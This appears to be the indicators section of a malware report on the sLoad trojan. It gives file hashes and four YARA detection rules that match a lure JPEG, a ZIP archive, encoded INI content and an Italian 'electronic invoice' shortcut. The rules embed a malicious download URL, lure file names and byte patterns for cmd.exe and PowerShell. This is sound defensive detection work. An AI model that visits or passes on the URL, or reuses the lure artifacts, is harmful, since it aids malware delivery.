· ee1dbf76665f5c07ba1c453d1890aa93307f759c5cce6f59f225111509482a64 ps1
· 062cc76eeb34d1d3bb5467836cd2d33cb973fc0a8129947af074675beb1fbf1f ini
· df1cb74942fe9d0897431752c2d9717190aa38f79834e22aa885ec8881134505
Yara rules
```yara
rule image_20181119_100714_50_jpg{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "Adobe Photoshop"
        $a2 = {3A 30 33 3A 32 38}
        $a3 = {FF D8 FF E0}
        $b = {B4 30 B8 B? ?? ?? ?? BA AD E3 ?? ?? C7 7F 84 6A 09 74 9F 75}
    condition:
        $a1 and $a2 and $a3 or $b
}

rule documento_aggiornato_novembre_ER16909FP9_zip{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "https://firetechnicaladvisor.com/"
        $a2 = {24 34 4D 61 30 58 32 6C 49 7A}
        $a3 = "image_20181119_100714_40.jpg"
        $a4 = "invio fattura elettronica.lnk"
        $a5 = {2B 27 2E 70 73 31}
        $b = {50 4B}
    condition:
        1 of ($a*) and $b
}

rule _ini_files{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "DkAYQBjADcANAA3ADUAMwBkADAA"
        $a2 = "ADMAMgA5AGUAYgA3AGYAM"
    condition:
        $a1 or $a2
}

rule invio_fattura_elettronica_lnk{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {63 00 3A 00 5C 00 75 00 73 00 65 00 72 00 73 00 5C 00 2A}
        $a2 = {4D 5A 35 10 00 53 79 73 74 65 6D 33 32}
        $b = {4C ??}
        $c = {63 6D 64 2E 65 78 65}
        $d = "i.e.x."
    condition:
        1 of ($a*) and $b and $c and $d
}
```